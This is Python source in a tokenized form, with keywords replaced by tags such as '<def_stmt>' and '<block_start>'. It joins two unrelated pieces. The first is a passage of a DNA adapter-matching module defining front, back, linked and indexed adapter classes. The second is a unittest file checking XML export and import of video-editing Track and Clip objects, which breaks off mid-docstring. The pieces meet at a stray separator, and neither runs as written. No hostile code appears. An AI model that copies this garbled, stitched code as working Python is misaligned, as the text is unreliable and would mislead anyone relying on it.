"""<line_sep>allows_partial_matches:bool=<true><def_stmt>__init__ self sequence:str max_errors:float=0.1 min_overlap:int=3 read_wildcards:bool=<false> adapter_wildcards:bool=<true> name:Optional[str]=<none> indels:bool=<true> <block_start>self.name:str=_generate_adapter_name()<if>name<is><none><else>name<line_sep>super().__init__(self.name)<line_sep>self._debug:bool=<false><line_sep>self.sequence:str=sequence.upper().replace("U" "T")<if_stmt><not>self.sequence<block_start><raise>ValueError("Adapter sequence is empty")<block_end><if_stmt>max_errors<ge>1<block_start>max_errors<augdiv>len(self.sequence)<block_end>self.max_error_rate:float=max_errors<line_sep>self.min_overlap:int=min(min_overlap len(self.sequence))<line_sep>iupac=frozenset('ABCDGHKMNRSTUVWXY')<if_stmt>adapter_wildcards<and><not>set(self.sequence)<le>iupac<block_start><for_stmt>c self.sequence<block_start><if_stmt>c<not><in>iupac<block_start><if_stmt>c<eq>"I"<block_start>extra="For inosine, consider using N instead and please comment "<concat>"on <https://github.com/marcelm/cutadapt/issues/546>."<block_end><else_stmt><block_start>extra="Use only characters 'ABCDGHKMNRSTUVWXY'."<block_end><raise>InvalidCharacter(f"Character '{c}' in adapter sequence '{self.sequence}' is "<concat>f"not a valid IUPAC code. {extra}")<block_end><block_end><block_end># Optimization: Use non-wildcard matching if only ACGT is used
self.adapter_wildcards:bool=adapter_wildcards<and><not>set(self.sequence)<le>set("ACGT")<line_sep>self.read_wildcards:bool=read_wildcards<line_sep>self.indels:bool=indels<line_sep>self.aligner=self._aligner()<block_end><def_stmt>_make_aligner self flags:int<arrow>Aligner# TODO
# Indels are suppressed by setting their cost very high, but a different algorithm
# should be used instead.
<block_start>indel_cost=1<if>self.indels<else>100000<line_sep><return>Aligner(self.sequence self.max_error_rate flags=flags wildcard_ref=self.adapter_wildcards wildcard_query=self.read_wildcards indel_cost=indel_cost min_overlap=self.min_overlap )<block_end><def_stmt>__repr__ self<block_start><return>'<{cls}(name={name!r}, sequence={sequence!r}, '<concat>'max_error_rate={max_error_rate}, min_overlap={min_overlap}, '<concat>'read_wildcards={read_wildcards}, '<concat>'adapter_wildcards={adapter_wildcards}, '<concat>'indels={indels})>'.format(cls=self.__class__.__name__ **vars(self))<block_end>@property<def_stmt>effective_length self<arrow>int<block_start><return>self.aligner.effective_length<block_end><def_stmt>enable_debug self<arrow><none><block_start>"""
Print out the dynamic programming matrix after matching a read to an
adapter.
"""<line_sep>self._debug=<true><line_sep>self.aligner.enable_debug()<block_end>@abstractmethod<def_stmt>_aligner self<block_start><pass><block_end>@abstractmethod<def_stmt>match_to self sequence:str<block_start>"""
Attempt to match this adapter to the given string.
Return a Match instance if a match was found;
return None if no match was found given the matching criteria (minimum
overlap length, maximum error rate).
"""<block_end><def_stmt>__len__ self<arrow>int<block_start><return>len(self.sequence)<block_end><block_end><class_stmt>FrontAdapter(SingleAdapter)<block_start>"""A 5' adapter"""<line_sep>description="regular 5'"<def_stmt>__init__ self *args **kwargs<block_start>self._force_anywhere=kwargs.pop("force_anywhere" <false>)<line_sep>super().__init__(*args **kwargs)<block_end><def_stmt>descriptive_identifier self<arrow>str<block_start><return>"regular_five_prime"<block_end><def_stmt>_aligner self<arrow>Aligner<block_start><return>self._make_aligner(Where.ANYWHERE.value<if>self._force_anywhere<else>Where.FRONT.value)<block_end><def_stmt>match_to self sequence:str<block_start>"""
Attempt to match this adapter to the given read.
Return a Match instance if a match was found;
return None if no match was found given the matching criteria (minimum
overlap length, maximum error rate).
"""<line_sep>alignment:Optional[Tuple[int int int int int int]]=self.aligner.locate(sequence)<if_stmt>self._debug<block_start>print(self.aligner.dpmatrix)<block_end><if_stmt>alignment<is><none><block_start><return><none><block_end><return>RemoveBeforeMatch(*alignment adapter=self sequence=sequence)<block_end><def_stmt>spec self<arrow>str<block_start><return>f"{self.sequence}..."<block_end><def_stmt>create_statistics self<arrow>FrontAdapterStatistics<block_start><return>FrontAdapterStatistics(self)<block_end><block_end><class_stmt>BackAdapter(SingleAdapter)<block_start>"""A 3' adapter"""<line_sep>description="regular 3'"<def_stmt>__init__ self *args **kwargs<block_start>self._force_anywhere=kwargs.pop("force_anywhere" <false>)<line_sep>super().__init__(*args **kwargs)<block_end><def_stmt>descriptive_identifier self<arrow>str<block_start><return>"regular_three_prime"<block_end><def_stmt>_aligner self<block_start><return>self._make_aligner(Where.ANYWHERE.value<if>self._force_anywhere<else>Where.BACK.value)<block_end><def_stmt>match_to self sequence:str<block_start>"""
Attempt to match this adapter to the given read.
Return a Match instance if a match was found;
return None if no match was found given the matching criteria (minimum
overlap length, maximum error rate).
"""<line_sep>alignment:Optional[Tuple[int int int int int int]]=self.aligner.locate(sequence)<if_stmt>self._debug<block_start>print(self.aligner.dpmatrix)# pragma: no cover
<block_end><if_stmt>alignment<is><none><block_start><return><none><block_end><return>RemoveAfterMatch(*alignment adapter=self sequence=sequence)<block_end><def_stmt>spec self<arrow>str<block_start><return>f"{self.sequence}"<block_end><def_stmt>create_statistics self<arrow>BackAdapterStatistics<block_start><return>BackAdapterStatistics(self)<block_end><block_end><class_stmt>AnywhereAdapter(SingleAdapter)<block_start>"""
An adapter that can be 5' or 3'. If a match involves the first base of
the read, it is assumed to be a 5' adapter and a 3' otherwise.
"""<line_sep>description="variable 5'/3'"<def_stmt>descriptive_identifier self<arrow>str<block_start><return>"anywhere"<block_end><def_stmt>_aligner self<block_start><return>self._make_aligner(Where.ANYWHERE.value)<block_end><def_stmt>match_to self sequence:str<block_start>"""
Attempt to match this adapter to the given string.
Return a Match instance if a match was found;
return None if no match was found given the matching criteria (minimum
overlap length, maximum error rate).
"""<line_sep>alignment=self.aligner.locate(sequence.upper())<if_stmt>self._debug<block_start>print(self.aligner.dpmatrix)<block_end><if_stmt>alignment<is><none><block_start><return><none><block_end># guess: if alignment starts at pos 0, it’s a 5' adapter
<if_stmt>alignment[2]<eq>0# index 2 is rstart
<block_start>match=RemoveBeforeMatch(*alignment adapter=self sequence=sequence)# type: ignore
<block_end><else_stmt><block_start>match=RemoveAfterMatch(*alignment adapter=self sequence=sequence)# type: ignore
<block_end><return>match<block_end><def_stmt>spec self<arrow>str<block_start><return>f"...{self.sequence}..."<block_end><def_stmt>create_statistics self<arrow>AnywhereAdapterStatistics<block_start><return>AnywhereAdapterStatistics(self)<block_end><block_end><class_stmt>NonInternalFrontAdapter(FrontAdapter)<block_start>"""A non-internal 5' adapter"""<line_sep>description="non-internal 5'"<def_stmt>descriptive_identifier self<arrow>str<block_start><return>"noninternal_five_prime"<block_end><def_stmt>_aligner self<block_start><return>self._make_aligner(Where.FRONT_NOT_INTERNAL.value)<block_end><def_stmt>match_to self sequence:str# The locate function takes care of uppercasing the sequence
<block_start>alignment=self.aligner.locate(sequence)<if_stmt>self._debug<block_start><try_stmt><block_start>print(self.aligner.dpmatrix)<block_end><except_stmt>AttributeError<block_start><pass><block_end><block_end><if_stmt>alignment<is><none><block_start><return><none><block_end><return>RemoveBeforeMatch(*alignment adapter=self sequence=sequence)<block_end># type: ignore
<def_stmt>spec self<arrow>str<block_start><return>f"X{self.sequence}..."<block_end><block_end><class_stmt>NonInternalBackAdapter(BackAdapter)<block_start>"""A non-internal 3' adapter"""<line_sep>description="non-internal 3'"<def_stmt>descriptive_identifier self<arrow>str<block_start><return>"noninternal_three_prime"<block_end><def_stmt>_aligner self<block_start><return>self._make_aligner(Where.BACK_NOT_INTERNAL.value)<block_end><def_stmt>match_to self sequence:str# The locate function takes care of uppercasing the sequence
<block_start>alignment=self.aligner.locate(sequence)<if_stmt>self._debug<block_start><try_stmt><block_start>print(self.aligner.dpmatrix)# pragma: no cover
<block_end><except_stmt>AttributeError<block_start><pass><block_end><block_end><if_stmt>alignment<is><none><block_start><return><none><block_end><return>RemoveAfterMatch(*alignment adapter=self sequence=sequence)<block_end># type: ignore
<def_stmt>spec self<arrow>str<block_start><return>f"{self.sequence}X"<block_end><block_end><class_stmt>PrefixAdapter(NonInternalFrontAdapter)<block_start>"""An anchored 5' adapter"""<line_sep>description="anchored 5'"<line_sep>allows_partial_matches=<false><def_stmt>__init__ self sequence:str *args **kwargs<block_start>kwargs["min_overlap"]=len(sequence)<line_sep>super().__init__(sequence *args **kwargs)<block_end><def_stmt>descriptive_identifier self<arrow>str<block_start><return>"anchored_five_prime"<block_end><def_stmt>_aligner self<block_start><if_stmt><not>self.indels# TODO or if error rate allows 0 errors anyway
<block_start><return>PrefixComparer(self.sequence self.max_error_rate wildcard_ref=self.adapter_wildcards wildcard_query=self.read_wildcards min_overlap=self.min_overlap)<block_end><else_stmt><block_start><return>self._make_aligner(Where.PREFIX.value)<block_end><block_end><def_stmt>spec self<arrow>str<block_start><return>f"^{self.sequence}..."<block_end><block_end><class_stmt>SuffixAdapter(NonInternalBackAdapter)<block_start>"""An anchored 3' adapter"""<line_sep>description="anchored 3'"<line_sep>allows_partial_matches=<false><def_stmt>__init__ self sequence:str *args **kwargs<block_start>kwargs["min_overlap"]=len(sequence)<line_sep>super().__init__(sequence *args **kwargs)<block_end><def_stmt>descriptive_identifier self<arrow>str<block_start><return>"anchored_three_prime"<block_end><def_stmt>_aligner self<block_start><if_stmt><not>self.indels# TODO or if error rate allows 0 errors anyway
<block_start><return>SuffixComparer(self.sequence self.max_error_rate wildcard_ref=self.adapter_wildcards wildcard_query=self.read_wildcards min_overlap=self.min_overlap)<block_end><else_stmt><block_start><return>self._make_aligner(Where.SUFFIX.value)<block_end><block_end><def_stmt>spec self<arrow>str<block_start><return>f"{self.sequence}$"<block_end><block_end><class_stmt>LinkedMatch(Match)<block_start>"""
Represent a match of a LinkedAdapter
"""<def_stmt>__init__ self front_match:RemoveBeforeMatch back_match:RemoveAfterMatch adapter:"LinkedAdapter"<block_start><assert_stmt>front_match<is><not><none><or>back_match<is><not><none><line_sep>self.front_match:RemoveBeforeMatch=front_match<line_sep>self.back_match:RemoveAfterMatch=back_match<line_sep>self.adapter:LinkedAdapter=adapter<block_end><def_stmt>__repr__ self<block_start><return>'<LinkedMatch(front_match={!r}, back_match={}, adapter={})>'.format(self.front_match self.back_match self.adapter)<block_end>@property<def_stmt>matches self<block_start>"""Number of matching bases"""<line_sep>m=0<if_stmt>self.front_match<is><not><none><block_start>m<augadd>self.front_match.matches<block_end><if_stmt>self.back_match<is><not><none><block_start>m<augadd>self.back_match.matches<block_end><return>m<block_end>@property<def_stmt>errors self<block_start>e=0<if_stmt>self.front_match<is><not><none><block_start>e<augadd>self.front_match.errors<block_end><if_stmt>self.back_match<is><not><none><block_start>e<augadd>self.back_match.errors<block_end><return>e<block_end><def_stmt>trimmed self read<block_start><if_stmt>self.front_match<block_start>read=self.front_match.trimmed(read)<block_end><if_stmt>self.back_match<block_start>read=self.back_match.trimmed(read)<block_end><return>read<block_end><def_stmt>remainder_interval self<arrow>Tuple[int int]<block_start>matches=[match<for>match [self.front_match self.back_match]<if>match<is><not><none>]<line_sep><return>remainder(matches)<block_end><def_stmt>retained_adapter_interval self<arrow>Tuple[int int]<block_start><if_stmt>self.front_match<block_start>start=self.front_match.rstart<line_sep>offset=self.front_match.rstop<block_end><else_stmt><block_start>start=offset=0<block_end><if_stmt>self.back_match<block_start>end=self.back_match.rstop+offset<block_end><else_stmt><block_start>end=len(self.front_match.sequence)<block_end><return>start end<block_end><def_stmt>get_info_records self 
read<arrow>List[List]<block_start>records=[]<for_stmt>match,namesuffix [(self.front_match ";1") (self.back_match ";2") ]<block_start><if_stmt>match<is><none><block_start><continue><block_end>record=match.get_info_records(read)[0]<line_sep>record[7]=("none"<if>self.adapter.name<is><none><else>self.adapter.name)+namesuffix<line_sep>records.append(record)<line_sep>read=match.trimmed(read)<block_end><return>records<block_end><block_end><class_stmt>LinkedAdapter(Adapter)<block_start>"""A 5' adapter combined with a 3' adapter"""<line_sep>description="linked"<def_stmt>__init__ self front_adapter:SingleAdapter back_adapter:SingleAdapter front_required:bool back_required:bool name:str <block_start>super().__init__(name)<line_sep>self.front_required=front_required<line_sep>self.back_required=back_required<line_sep># The following attributes are needed for the report
self.where="linked"<line_sep>self.name=_generate_adapter_name()<if>name<is><none><else>name<line_sep>self.front_adapter=front_adapter<line_sep>self.front_adapter.name=self.name<line_sep>self.back_adapter=back_adapter<block_end><def_stmt>descriptive_identifier self<arrow>str<block_start><return>"linked"<block_end><def_stmt>enable_debug self<block_start>self.front_adapter.enable_debug()<line_sep>self.back_adapter.enable_debug()<block_end><def_stmt>match_to self sequence:str<arrow>Optional[LinkedMatch]<block_start>"""
Match the two linked adapters against a string
"""<line_sep>front_match=self.front_adapter.match_to(sequence)<if_stmt>self.front_required<and>front_match<is><none><block_start><return><none><block_end><if_stmt>front_match<is><not><none><block_start>sequence=sequence[front_match.trim_slice()]<block_end>back_match=self.back_adapter.match_to(sequence)<if_stmt>back_match<is><none><and>(self.back_required<or>front_match<is><none>)<block_start><return><none><block_end><return>LinkedMatch(front_match back_match self)<block_end><def_stmt>create_statistics self<arrow>LinkedAdapterStatistics<block_start><return>LinkedAdapterStatistics(self front=self.front_adapter back=self.back_adapter)<block_end>@property<def_stmt>sequence self<block_start><return>self.front_adapter.sequence+"..."+self.back_adapter.sequence<block_end>@property<def_stmt>remove self<block_start><return><none><block_end><def_stmt>spec self<arrow>str<block_start><return>f"{self.front_adapter.spec()}...{self.back_adapter.spec()}"<block_end><block_end><class_stmt>MultipleAdapters(Matchable)<block_start>"""
Represent multiple adapters at once
"""<def_stmt>__init__ self adapters:Sequence[Matchable]<block_start>super().__init__(name="multiple_adapters")<line_sep>self._adapters=adapters<block_end><def_stmt>enable_debug self<block_start><for_stmt>a self._adapters<block_start>a.enable_debug()<block_end><block_end><def_stmt>__getitem__ self item<block_start><return>self._adapters[item]<block_end><def_stmt>__len__ self<block_start><return>len(self._adapters)<block_end><def_stmt>match_to self sequence:str<arrow>Optional[SingleMatch]<block_start>"""
Find the adapter that best matches the sequence.
Return either a Match instance or None if there are no matches.
"""<line_sep>best_match=<none><for_stmt>adapter self._adapters<block_start>match=adapter.match_to(sequence)<if_stmt>match<is><none><block_start><continue><block_end># the no. of matches determines which adapter fits best
<if_stmt>best_match<is><none><or>match.matches<g>best_match.matches<or>(match.matches<eq>best_match.matches<and>match.errors<l>best_match.errors)<block_start>best_match=match<block_end><block_end><return>best_match<block_end><block_end><class_stmt>IndexedAdapters(Matchable ABC)<block_start>"""
Represent multiple adapters of the same type at once and use an index data structure
to speed up matching. This acts like a "normal" Adapter as it provides a match_to
method, but is faster with lots of adapters.
There are quite a few restrictions:
- the error rate allows at most 2 mismatches
- wildcards in the adapter are not allowed
- wildcards in the read are not allowed
Use the is_acceptable() method to check individual adapters.
"""<line_sep>AdapterIndex=Dict[str Tuple[SingleAdapter int int]]<def_stmt>__init__ self adapters<block_start>"""All given adapters must be of the same type"""<line_sep>super().__init__(name="indexed_adapters")<if_stmt><not>adapters<block_start><raise>ValueError("Adapter list is empty")<block_end><for_stmt>adapter adapters<block_start>self._accept(adapter)<block_end>self._adapters=adapters<line_sep>self._multiple_adapters=MultipleAdapters(adapters)<line_sep>self._lengths,self._index=self._make_index()<line_sep>logger.debug("String lengths in the index: %s" sorted(self._lengths reverse=<true>))<if_stmt>len(self._lengths)<eq>1<block_start>self._length=self._lengths[0]<line_sep>self.match_to=self._match_to_one_length<block_end><else_stmt><block_start>self.match_to=self._match_to_multiple_lengths<block_end>self._make_affix=self._get_make_affix()<block_end><def_stmt>__repr__ self<block_start><return>f"{self.__class__.__name__}(adapters={self._adapters!r})"<block_end><def_stmt>match_to self sequence:str<block_start>"""Never called because it gets overwritten in __init__"""<block_end>@abstractmethod<def_stmt>_get_make_affix self<block_start><pass><block_end>@abstractmethod<def_stmt>_make_match self adapter length matches errors sequence<arrow>SingleMatch<block_start><pass><block_end>@classmethod<def_stmt>_accept cls adapter<block_start>"""Raise a ValueError if the adapter is not acceptable"""<if_stmt>adapter.read_wildcards<block_start><raise>ValueError("Wildcards in the read not supported")<block_end><if_stmt>adapter.adapter_wildcards<block_start><raise>ValueError("Wildcards in the adapter not supported")<block_end>k=int(len(adapter)<times>adapter.max_error_rate)<if_stmt>k<g>2<block_start><raise>ValueError("Error rate too high")<block_end><block_end>@classmethod<def_stmt>is_acceptable cls adapter<block_start>"""
Return whether this adapter is acceptable for being used in an index
Adapters are not acceptable if they allow wildcards, allow too many errors,
or would lead to a very large index.
"""<try_stmt><block_start>cls._accept(adapter)<block_end><except_stmt>ValueError<block_start><return><false><block_end><return><true><block_end><def_stmt>_make_index self<arrow>Tuple[List[int] "AdapterIndex"]<block_start>logger.info('Building index of %s adapters ...' len(self._adapters))<line_sep>index:Dict[str Tuple[SingleAdapter int int]]=dict()<line_sep>lengths=set()<line_sep>has_warned=<false><for_stmt>adapter self._adapters<block_start>sequence=adapter.sequence<line_sep>k=int(adapter.max_error_rate<times>len(sequence))<line_sep>environment=edit_environment<if>adapter.indels<else>hamming_environment<for_stmt>s,errors,matches environment(sequence k)<block_start><if_stmt>s<in>index<block_start>other_adapter,other_errors,other_matches=index[s]<if_stmt>matches<l>other_matches<block_start><continue><block_end><if_stmt>other_matches<eq>matches<and><not>has_warned<block_start>logger.warning("Adapters %s %r and %s %r are very similar. At %s allowed errors, "<concat>"the sequence %r cannot be assigned uniquely because the number of "<concat>"matches is %s compared to both adapters." other_adapter.name other_adapter.sequence adapter.name adapter.sequence k s matches)<line_sep>has_warned=<true><block_end><block_end><else_stmt><block_start>index[s]=(adapter errors matches)<block_end>lengths.add(len(s))<block_end><block_end>logger.info('Built an index containing %s strings.' len(index))<line_sep><return>sorted(lengths reverse=<true>) index<block_end><def_stmt>_match_to_one_length self sequence:str<block_start>"""
Match the adapters against a string and return a Match that represents
the best match or None if no match was found
"""<line_sep>affix=self._make_affix(sequence.upper() self._length)<if_stmt>"N"<in>affix# Fall back to non-indexed matching
<block_start><return>self._multiple_adapters.match_to(sequence)<block_end><try_stmt><block_start>adapter,e,m=self._index[affix]<block_end><except_stmt>KeyError<block_start><return><none><block_end><return>self._make_match(adapter self._length m e sequence)<block_end><def_stmt>_match_to_multiple_lengths self sequence:str<block_start>"""
Match the adapters against a string and return a Match that represents
the best match or None if no match was found
"""<line_sep>affix=sequence.upper()<line_sep># Check all the prefixes or suffixes (affixes) that could match
best_adapter:Optional[SingleAdapter]=<none><line_sep>best_length=0<line_sep>best_m=-1<line_sep>best_e=1000<line_sep>check_n=<true><for_stmt>length self._lengths<block_start><if_stmt>length<l>best_m# No chance of getting the same or a higher number of matches, so we can stop early
<block_start><break><block_end>affix=self._make_affix(affix length)<if_stmt>check_n<block_start><if_stmt>"N"<in>affix<block_start><return>self._multiple_adapters.match_to(sequence)<block_end>check_n=<false><block_end><try_stmt><block_start>adapter,e,m=self._index[affix]<block_end><except_stmt>KeyError<block_start><continue><block_end><if_stmt>m<g>best_m<or>(m<eq>best_m<and>e<l>best_e)# TODO this could be made to work:
# assert best_m == -1
<block_start>best_adapter=adapter<line_sep>best_e=e<line_sep>best_m=m<line_sep>best_length=length<block_end><block_end><if_stmt>best_m<eq>-1<block_start><return><none><block_end><else_stmt><block_start><return>self._make_match(best_adapter best_length best_m best_e sequence)<block_end><block_end><def_stmt>enable_debug self<block_start><pass><block_end><block_end><class_stmt>IndexedPrefixAdapters(IndexedAdapters)<block_start>@classmethod<def_stmt>_accept cls adapter<block_start><if_stmt><not>isinstance(adapter PrefixAdapter)<block_start><raise>ValueError("Only 5' anchored adapters are allowed")<block_end><return>super()._accept(adapter)<block_end><def_stmt>_make_match self adapter length matches errors sequence<block_start><return>RemoveBeforeMatch(astart=0 astop=len(adapter.sequence) rstart=0 rstop=length matches=matches errors=errors adapter=adapter sequence=sequence )<block_end><def_stmt>_get_make_affix self<block_start><return>self._make_prefix<block_end>@staticmethod<def_stmt>_make_prefix s n<block_start><return>s[:n]<block_end><block_end><class_stmt>IndexedSuffixAdapters(IndexedAdapters)<block_start>@classmethod<def_stmt>_accept cls adapter<block_start><if_stmt><not>isinstance(adapter SuffixAdapter)<block_start><raise>ValueError("Only anchored 3' adapters are allowed")<block_end><return>super()._accept(adapter)<block_end><def_stmt>_make_match self adapter length matches errors sequence<block_start><return>RemoveAfterMatch(astart=0 astop=len(adapter.sequence) rstart=len(sequence)-length rstop=len(sequence) matches=matches errors=errors adapter=adapter sequence=sequence )<block_end><def_stmt>_get_make_affix self<block_start><return>self._make_suffix<block_end>@staticmethod<def_stmt>_make_suffix s n<block_start><return>s[-n:]<block_end><block_end><def_stmt>warn_duplicate_adapters adapters<block_start>d=dict()<for_stmt>adapter adapters<block_start>key=(adapter.__class__ adapter.sequence)<if_stmt>key<in>d<block_start>logger.warning("Adapter %r (%s) was specified 
multiple times! "<concat>"Please make sure that this is what you want." adapter.sequence adapter.description)<block_end>d[key]=adapter.name<block_end><block_end><def_stmt>remainder matches:Sequence[Match]<arrow>Tuple[int int]<block_start>"""
Determine which section of the read would not be trimmed. Return a tuple (start, stop)
that gives the interval of the untrimmed part relative to the original read.
matches must be non-empty
"""<if_stmt><not>matches<block_start><raise>ValueError("matches must not be empty")<block_end>start=0<for_stmt>match matches<block_start>match_start,match_stop=match.remainder_interval()<line_sep>start<augadd>match_start<block_end>length=match_stop-match_start<line_sep><return>(start start+length)<block_end> |
# -*- coding: utf-8 -*-
<import_stmt>unittest<import_from_stmt>anima.edit Track Clip File<class_stmt>TrackTestCase(unittest.TestCase)<block_start>"""tests the anima.previs.Track class
"""<def_stmt>test_to_xml_method_is_working_properly self<block_start>"""testing if the to xml method is working properly
"""<line_sep>t=Track()<line_sep>t.enabled=<true><line_sep>t.locked=<false><line_sep># clip 1
f=File()<line_sep>f.duration=34<line_sep>f.name='shot2'<line_sep>f.pathurl='file://localhost/home/eoyilmaz/maya/projects/default/data/shot2.mov'<line_sep>c=Clip()<line_sep>c.id='shot2'<line_sep>c.start=1<line_sep>c.end=35<line_sep>c.name='shot2'<line_sep>c.enabled=<true><line_sep>c.duration=34<line_sep>c.in_=0<line_sep>c.out=34<line_sep>c.file=f<line_sep>t.clips.append(c)<line_sep># clip 2
f=File()<line_sep>f.duration=30<line_sep>f.name='shot'<line_sep>f.pathurl='file://localhost/home/eoyilmaz/maya/projects/default/data/shot.mov'<line_sep>c=Clip()<line_sep>c.id='shot'<line_sep>c.start=35<line_sep>c.end=65<line_sep>c.name='shot'<line_sep>c.enabled=<true><line_sep>c.duration=30<line_sep>c.in_=0<line_sep>c.out=30<line_sep>c.file=f<line_sep>t.clips.append(c)<line_sep># clip 3
f=File()<line_sep>f.duration=45<line_sep>f.name='shot1'<line_sep>f.pathurl='file://localhost/home/eoyilmaz/maya/projects/default/data/shot1.mov'<line_sep>c=Clip()<line_sep>c.id='shot1'<line_sep>c.start=65<line_sep>c.end=110<line_sep>c.name='shot1'<line_sep>c.enabled=<true><line_sep>c.duration=45<line_sep>c.in_=0<line_sep>c.out=45<line_sep>c.file=f<line_sep>t.clips.append(c)<line_sep>expected_xml="""<track>
<locked>FALSE</locked>
<enabled>TRUE</enabled>
<clipitem id="shot2">
<end>35</end>
<name>shot2</name>
<enabled>True</enabled>
<start>1</start>
<in>0</in>
<duration>34</duration>
<out>34</out>
<file id="shot2.mov">
<duration>34</duration>
<name>shot2</name>
<pathurl>file://localhost/home/eoyilmaz/maya/projects/default/data/shot2.mov</pathurl>
</file>
</clipitem>
<clipitem id="shot">
<end>65</end>
<name>shot</name>
<enabled>True</enabled>
<start>35</start>
<in>0</in>
<duration>30</duration>
<out>30</out>
<file id="shot.mov">
<duration>30</duration>
<name>shot</name>
<pathurl>file://localhost/home/eoyilmaz/maya/projects/default/data/shot.mov</pathurl>
</file>
</clipitem>
<clipitem id="shot1">
<end>110</end>
<name>shot1</name>
<enabled>True</enabled>
<start>65</start>
<in>0</in>
<duration>45</duration>
<out>45</out>
<file id="shot1.mov">
<duration>45</duration>
<name>shot1</name>
<pathurl>file://localhost/home/eoyilmaz/maya/projects/default/data/shot1.mov</pathurl>
</file>
</clipitem>
</track>"""<line_sep>self.assertEqual(expected_xml t.to_xml())<block_end><def_stmt>test_from_xml_method_is_working_properly self<block_start>"""testing if the from_xml method will fill object attributes from the
given xml node
"""<import_from_stmt>xml.etree ElementTree<line_sep>track_node=ElementTree.Element('track')<line_sep>locked_node=ElementTree.SubElement(track_node 'locked')<line_sep>locked_node.text='FALSE'<line_sep>enabled_node=ElementTree.SubElement(track_node 'enabled')<line_sep>enabled_node.text='TRUE'<line_sep># clip1
clip_node=ElementTree.SubElement(track_node 'clipitem' attrib={'id':'shot2'})<line_sep>end_node=ElementTree.SubElement(clip_node 'end')<line_sep>end_node.text='35'<line_sep>name_node=ElementTree.SubElement(clip_node 'name')<line_sep>name_node.text='shot2'<line_sep>enabled_node=ElementTree.SubElement(clip_node 'enabled')<line_sep>enabled_node.text='True'<line_sep>start_node=ElementTree.SubElement(clip_node 'start')<line_sep>start_node.text='1'<line_sep>in_node=ElementTree.SubElement(clip_node 'in')<line_sep>in_node.text='0'<line_sep>duration_node=ElementTree.SubElement(clip_node 'duration')<line_sep>duration_node.text='34'<line_sep>out_node=ElementTree.SubElement(clip_node 'out')<line_sep>out_node.text='34'<line_sep>file_node=ElementTree.SubElement(clip_node 'file')<line_sep>duration_node=ElementTree.SubElement(file_node 'duration')<line_sep>duration_node.text='34'<line_sep>name_node=ElementTree.SubElement(file_node 'name')<line_sep>name_node.text='shot2'<line_sep>pathurl_node=ElementTree.SubElement(file_node 'pathurl')<line_sep>pathurl='file://localhost/home/eoyilmaz/maya/projects/default/data/shot2.mov'<line_sep>pathurl_node.text=pathurl<line_sep># clip2
clip_node=ElementTree.SubElement(track_node 'clipitem' attrib={'id':'shot'})<line_sep>end_node=ElementTree.SubElement(clip_node 'end')<line_sep>end_node.text='65'<line_sep>name_node=ElementTree.SubElement(clip_node 'name')<line_sep>name_node.text='shot'<line_sep>enabled_node=ElementTree.SubElement(clip_node 'enabled')<line_sep>enabled_node.text='True'<line_sep>start_node=ElementTree.SubElement(clip_node 'start')<line_sep>start_node.text='35'<line_sep>in_node=ElementTree.SubElement(clip_node 'in')<line_sep>in_node.text='0'<line_sep>duration_node=ElementTree.SubElement(clip_node 'duration')<line_sep>duration_node.text='30'<line_sep>out_node=ElementTree.SubElement(clip_node 'out')<line_sep>out_node.text='30'<line_sep>file_node=ElementTree.SubElement(clip_node 'file')<line_sep>duration_node=ElementTree.SubElement(file_node 'duration')<line_sep>duration_node.text='30'<line_sep>name_node=ElementTree.SubElement(file_node 'name')<line_sep>name_node.text='shot'<line_sep>pathurl_node=ElementTree.SubElement(file_node 'pathurl')<line_sep>pathurl='file://localhost/home/eoyilmaz/maya/projects/default/data/shot.mov'<line_sep>pathurl_node.text=pathurl<line_sep># clip3
clip_node=ElementTree.SubElement(track_node 'clipitem' attrib={'id':'shot1'})<line_sep>end_node=ElementTree.SubElement(clip_node 'end')<line_sep>end_node.text='110'<line_sep>name_node=ElementTree.SubElement(clip_node 'name')<line_sep>name_node.text='shot1'<line_sep>enabled_node=ElementTree.SubElement(clip_node 'enabled')<line_sep>enabled_node.text='True'<line_sep>start_node=ElementTree.SubElement(clip_node 'start')<line_sep>start_node.text='65'<line_sep>in_node=ElementTree.SubElement(clip_node 'in')<line_sep>in_node.text='0'<line_sep>duration_node=ElementTree.SubElement(clip_node 'duration')<line_sep>duration_node.text='45'<line_sep>out_node=ElementTree.SubElement(clip_node 'out')<line_sep>out_node.text='45'<line_sep>file_node=ElementTree.SubElement(clip_node 'file')<line_sep>duration_node=ElementTree.SubElement(file_node 'duration')<line_sep>duration_node.text='45'<line_sep>name_node=ElementTree.SubElement(file_node 'name')<line_sep>name_node.text='shot1'<line_sep>pathurl_node=ElementTree.SubElement(file_node 'pathurl')<line_sep>pathurl='file://localhost/home/eoyilmaz/maya/projects/default/data/shot1.mov'<line_sep>pathurl_node.text=pathurl<line_sep>t=Track()<line_sep>t.from_xml(track_node)<line_sep>self.assertEqual(<false> t.locked)<line_sep>self.assertEqual(<true> t.enabled)<line_sep># clip1
c=t.clips[0]<line_sep>self.assertEqual(35 c.end)<line_sep>self.assertEqual('shot2' c.name)<line_sep>self.assertEqual(<true> c.enabled)<line_sep>self.assertEqual(1 c.start)<line_sep>self.assertEqual(0 c.in_)<line_sep>self.assertEqual(34 c.duration)<line_sep>self.assertEqual(34 c.out)<line_sep>f=c.file<line_sep>self.assertEqual(34 f.duration)<line_sep>self.assertEqual('shot2' f.name)<line_sep>self.assertEqual('file://localhost/home/eoyilmaz/maya/projects/default/data/shot2.mov' f.pathurl)<line_sep># clip2
c=t.clips[1]<line_sep>self.assertEqual(65 c.end)<line_sep>self.assertEqual('shot' c.name)<line_sep>self.assertEqual(<true> c.enabled)<line_sep>self.assertEqual(35 c.start)<line_sep>self.assertEqual(0 c.in_)<line_sep>self.assertEqual(30 c.duration)<line_sep>self.assertEqual(30 c.out)<line_sep>f=c.file<line_sep>self.assertEqual(30 f.duration)<line_sep>self.assertEqual('shot' f.name)<line_sep>self.assertEqual('file://localhost/home/eoyilmaz/maya/projects/default/data/shot.mov' f.pathurl)<line_sep># clip3
c=t.clips[2]<line_sep>self.assertEqual(110 c.end)<line_sep>self.assertEqual('shot1' c.name)<line_sep>self.assertEqual(<true> c.enabled)<line_sep>self.assertEqual(65 c.start)<line_sep>self.assertEqual(0 c.in_)<line_sep>self.assertEqual(45 c.duration)<line_sep>self.assertEqual(45 c.out)<line_sep>f=c.file<line_sep>self.assertEqual(45 f.duration)<line_sep>self.assertEqual('shot1' f.name)<line_sep>self.assertEqual('file://localhost/home/eoyilmaz/maya/projects/default/data/shot1.mov' f.pathurl)<block_end><def_stmt>test_optimize_clips_is_working_properly self<block_start>"""testing if the optimize_clips method will optimize the clips to use
the same file node if the file pathurls are same
